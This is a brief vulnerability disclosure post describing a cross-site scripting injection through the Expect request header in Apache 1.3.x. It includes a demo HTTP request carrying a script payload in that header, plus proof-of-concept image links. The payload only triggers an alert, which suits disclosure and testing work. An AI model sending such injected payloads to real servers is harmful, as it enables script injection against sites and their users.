facebook facebook twitter rss

Apache/1.3.X (Expect) Header Inject

Author: Cold z3ro , Published: 10-01-2015
# Apache/1.3.X (Expect) Header Inject
# tested on Apache/1.3.34
# by Cold z3ro, www.hackteach.org | https://www.facebook.com/groups/hackteach.org

Expect
The Expect request-header field is used to indicate that particular server behaviors are required by the client.

# attack with adding header "Expect"
demo header :

-----------------------------------------
GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html
Accept-Language: en-US
Expect: <script> alert('HTLOVER') </script>
Connection: keep-alive
-----------------------------------------
POC
https://www.facebook.com/photo.php?fbid=891554550868724
https://www.facebook.com/photo.php?fbid=891554584202054
https://www.facebook.com/photo.php?fbid=891554517535394

Like us on Facebook :